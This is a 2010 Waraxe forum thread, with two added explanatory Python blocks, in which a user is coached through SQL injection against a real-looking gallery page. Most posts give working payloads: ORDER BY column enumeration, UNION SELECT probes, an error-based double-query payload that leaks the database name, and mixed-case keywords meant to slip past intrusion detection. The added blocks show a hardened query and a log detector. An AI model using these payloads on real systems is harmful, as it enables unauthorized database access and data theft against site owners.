Waraxe IT Security Portal  
What if the webpage doesn't disclose number of columns
Posted: Thu Sep 16, 2010 6:59 am
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hello waraxe and experts,

Please forgive my lack of knowledge and don't bash me : )
Usually at this step I just give up, but this time I really want to get on with this issue and learn for further experience.

I have a webpage which responds to the simplest test like this:
Code:
http://site.com/guests_galleries.php?kat=1'

responding with

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC LIMIT 0, 12' at line 1

But then when I try the next test
Code:
http://site.com/guests_galleries.php?kat=1+order+by+2--

it responds with

Quote:
Unknown column '2' in 'order clause'

I'm positive there are steps to take when such an error is displayed; I just don't have a clue what they are.
I can't search or google either, because I don't know what I'm looking for.

Please guide me : )

Thanks in advance!
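The behaviour RubberDoll describes (a stray quote breaks the query, while ORDER BY N either returns the normal page or an "Unknown column" error) is what an integer parameter concatenated unquoted into the SQL string produces. The following is an added example and not the forum's code or the real guests_galleries.php, whose source is not shown in the thread; it uses sqlite3 in place of MySQL with a constructed galleries table, and puts that vulnerable construction next to a hardened version (integer validation, a bound parameter, an allow-listed sort column), which is the fix a site owner would apply. Function, table and column names are the example's own choices.

```python
"""Why `kat=1'` breaks the query while `kat=1 order by 2--` is accepted.

Added example, not the forum's code and not the site's guests_galleries.php
(whose source is not shown in the thread). It reproduces the behaviour the
post describes: an integer parameter concatenated into the SQL string
unquoted. sqlite3 stands in for MySQL; the table and rows are constructed.
"""
import sqlite3

# Constructed sample schema: the SELECT below returns two columns, so
# "ORDER BY 2" is accepted and "ORDER BY 3" is an error, mirroring the
# "Unknown column 'N' in 'order clause'" responses seen in the thread.
SCHEMA = """
CREATE TABLE galleries (
    id INTEGER PRIMARY KEY,
    kat INTEGER,
    title TEXT,
    galleries_added TEXT
);
INSERT INTO galleries VALUES
    (1, 1, 'first',  '2010-09-01'),
    (2, 1, 'second', '2010-09-02'),
    (3, 2, 'other',  '2010-09-03');
"""


def connect():
    """Open an in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, kat):
    """Hypothetical vulnerable version: the raw parameter becomes part of the SQL.

    Returns ("ok", rows) or ("error", message), the two outcomes the thread
    reports (normal page vs. SQL error text).
    """
    sql = ("SELECT title, galleries_added FROM galleries WHERE kat=" + kat
           + " ORDER BY galleries_added DESC LIMIT 0, 12")
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


# Allow-list for user-selectable sort columns: an ORDER BY column cannot be
# bound as a parameter, so it must come from a fixed mapping instead.
ALLOWED_SORT = {"added": "galleries_added", "title": "title"}


def hardened_lookup(conn, kat, sort="added"):
    """Hardened version: validate the integer, bind it, allow-list the sort column."""
    try:
        kat_id = int(kat)          # rejects "1'" and "1 order by 2--" outright
    except ValueError:
        return ("rejected", "kat must be an integer")
    column = ALLOWED_SORT.get(sort)
    if column is None:
        return ("rejected", "unknown sort column")
    sql = ("SELECT title, galleries_added FROM galleries WHERE kat=? "
           f"ORDER BY {column} DESC LIMIT 0, 12")
    return ("ok", conn.execute(sql, (kat_id,)).fetchall())


if __name__ == "__main__":
    db = connect()
    for probe in ("1", "1'", "1 order by 2--", "1 order by 3--"):
        print(f"vulnerable kat={probe!r}: {vulnerable_lookup(db, probe)}")
        print(f"hardened   kat={probe!r}: {hardened_lookup(db, probe)}")
```

Running the block shows the vulnerable function returning the normal rows for `1`, a syntax error for `1'`, a re-sorted result for `1 order by 2--` and an out-of-range error for `1 order by 3--`, while the hardened function answers only the plain integer and rejects everything else before any SQL is built.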
Posted: Fri Sep 17, 2010 8:42 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Try:

Code:
http://site.com/guests_galleries.php?kat=1+order+by+1--

If you get no error, then it's one column only.
Next test:

Code:
http://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--

Try to find the string "11223344" in the HTML source code.
Posted: Fri Sep 17, 2010 11:42 am
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hi waraxe, and thank you for your time.

Well, I thought it must have more than one column, because the initial error mentions
Quote:
near '' ORDER BY galleries_added DESC'

I forgot to mention that
://site.com/guests_galleries.php?kat=1+order+by+1--
results in a perfect original page.

I also discovered that, incrementing
://site.com/guests_galleries.php?kat=1+order+by+2--
up to
://site.com/guests_galleries.php?kat=1+order+by+26--

the error only appears once:
Quote:
Unknown column '26' in 'order clause'

etc., while

://site.com/guests_galleries.php?kat=1+order+by+27--

and higher results in the error being displayed twice:

Quote:
Unknown column '27' in 'order clause'Unknown column '27' in 'order clause'

So I'm thinking maybe there could be 26 columns in this table?

But trying
://site.com/guests_galleries.php?kat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

I get a blank part of the page where the content normally is.

The same happens when trying ://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--

I've checked the source in all cases, including the last one as you suggested, and there's nothing there (no 11223344 in our case).

Instead, it shows this HTML code in the source:

Code:
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>

I hope I've provided all necessary info :)

Thanks again
Posted: Fri Sep 17, 2010 1:48 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

You must try to get working data feedback.
Try:

Code:
http://site.com/guests_galleries.php?kat=-1+union+all+select+1122331,1122332,1122333,1122334,1122335,1122336,1122337,1122338,1122339,11223310,11223311,11223312,11223313,11223314,11223315,11223316,11223317,11223318,11223319,11223320,11223321,11223322,11223323,11223324,11223325,11223326--

and look for specific strings.
If you are unable to get normal data feedback, then exploitation may still be possible - there are blind injection methods for that, for example:

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
Posted: Fri Sep 17, 2010 3:52 pm
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Thanks a lot waraxe.
Unfortunately this yielded the same <p> ;;</p> stuff, so I'll turn to reading in the hope of seeing the light, although it might prove very difficult since my scripting-language skills are zero.

And thank you for the link :)
Posted: Sat Sep 18, 2010 2:45 am
Plitvix
Beginner
Joined: Sep 18, 2010
Posts: 1

Maybe you can try some double query injections like
Code:
 aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- -

It will probably work.
Posted: Mon Sep 20, 2010 7:16 am
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hello Plitvix,

Unfortunately not, but thank you.
By the way, why the mixture of uppercase and lowercase letters?

Plitvix wrote:
Maybe you can try some double query injections like
Code:
 aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- -

It will probably work.
Posted: Mon Sep 20, 2010 8:58 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Mixed-case letters may sometimes let it pass undetected by IDS/IPS.
Try this:

Code:
http://site.com/guests_galleries.php?kat=1+aND(SeLEct+1+FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct+CoNCaT(DaTABasE())+FrOM+inFoRMAtioN_ScHEmA.TabLEs+LiMiT+0,1),fLOOr(Rand(0)*2))x+FrOM+inFoRMAtioN_ScHEmA.TabLEs+GrOUP+bY+x)a)

Do you get any SQL error messages?
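waraxe's remark about mixed case slipping past IDS/IPS also points at the detection-side fix: decode and normalise the request before matching, and treat case-only obfuscation of keywords as a signal in its own right. The following is an added example written from the defender's side, not code from the forum or from waraxe. It scans constructed Apache-style access-log lines (made-up client addresses and timestamps) that reuse the request URLs quoted earlier in this thread, and flags the ORDER BY enumeration, the UNION probe and the error-based payload, plus a separate mixed-case indicator. The log format, the signature names and the alert fields are this example's own choices.

```python
"""Spot ORDER BY enumeration, UNION probes and mixed-case keyword evasion in
web access logs by normalising the query string before matching.

Added example written from the defender's side; it is not code from the
forum. The log lines are constructed (Apache combined-style, made-up hosts
and timestamps) and reuse the request URLs quoted in this thread. The
signature names and the alert fields are this example's own choices.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log; the fourth line carries the mixed-case payload from
# the thread with its one literal space encoded as %20, as a server would log it.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Sep/2010:11:40:01 +0000] "GET /guests_galleries.php?kat=1 HTTP/1.1" 200 5120
203.0.113.5 - - [17/Sep/2010:11:40:09 +0000] "GET /guests_galleries.php?kat=1+order+by+26-- HTTP/1.1" 200 4090
203.0.113.5 - - [17/Sep/2010:11:40:15 +0000] "GET /guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344-- HTTP/1.1" 200 3988
203.0.113.5 - - [20/Sep/2010:08:58:30 +0000] "GET /guests_galleries.php?kat=1+aND(SeLEct+1+FrOM(SeLEct%20CoUNt(*),CoNCaT((SeLEct+CoNCaT(DaTABasE())+FrOM+inFoRMAtioN_ScHEmA.TabLEs+LiMiT+0,1),fLOOr(Rand(0)*2))x+FrOM+inFoRMAtioN_ScHEmA.TabLEs+GrOUP+bY+x)a) HTTP/1.1" 200 4012
198.51.100.7 - - [20/Sep/2010:09:01:00 +0000] "GET /guests_galleries.php?kat=2 HTTP/1.1" 200 5231
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+)'
)

# Matched against the normalised value (decoded, lower-cased, whitespace
# collapsed), so "SeLEct" and "select" look identical to the detector.
SIGNATURES = {
    "order_by_enum": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion(?: all)? select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "error_based_rand_groupby": re.compile(r"floor\(rand\(\d*\)\*2\).*\bgroup by\b"),
}

# Keywords checked on the raw decoded value to notice case-only obfuscation.
KEYWORD_RE = re.compile(
    r"\b(select|union|from|where|concat|limit|order|group|by|and|or)\b", re.I
)


def normalise(raw_value):
    """URL-decode ('+' and %XX), collapse whitespace and lower-case."""
    return re.sub(r"\s+", " ", unquote_plus(raw_value)).strip().lower()


def has_mixed_case_keywords(raw_value):
    """True if any SQL keyword appears in mixed case, e.g. 'SeLEct' or 'aND'."""
    for match in KEYWORD_RE.finditer(unquote_plus(raw_value)):
        word = match.group(0)
        if word != word.lower() and word != word.upper():
            return True
    return False


def query_params(url):
    """Yield (name, raw_value) pairs without decoding, so original casing survives."""
    for pair in urlsplit(url).query.split("&"):
        if pair:
            name, _, raw = pair.partition("=")
            yield name, raw


def analyse_url(url):
    """Return (sorted signature hits, mixed_case flag) for one request URL."""
    hits, mixed = set(), False
    for _name, raw in query_params(url):
        value = normalise(raw)
        hits.update(sig for sig, rx in SIGNATURES.items() if rx.search(value))
        mixed = mixed or has_mixed_case_keywords(raw)
    return sorted(hits), mixed


def scan_log(text):
    """Parse access-log lines and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits, mixed = analyse_url(m.group("url"))
        if hits or mixed:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                           "url": m.group("url"), "hits": hits, "mixed_case": mixed})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["ts"], alert["hits"],
              "mixed-case keywords" if alert["mixed_case"] else "")
```

The point of decoding and lower-casing first is that the signatures stay short and readable while "SeLEct", "SELECT" and "%53elect" all reach them as the same text; the mixed-case check runs on the decoded but un-lowered value, because that is where the evasion attempt is still visible. In a real deployment the same normalisation would be applied to POST bodies and headers, not only the query string.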
Posted: Wed Sep 29, 2010 9:48 am
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hello again waraxe, thank you for still keeping an eye on this topic :)

Yes, in fact I do.
Well, I get an error; whether it's an SQL-related error, I'm not sure anymore.

Code:
Duplicate entry 'kylacolepre1' for key 1Duplicate entry 'kylacolepre1' for key 1
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"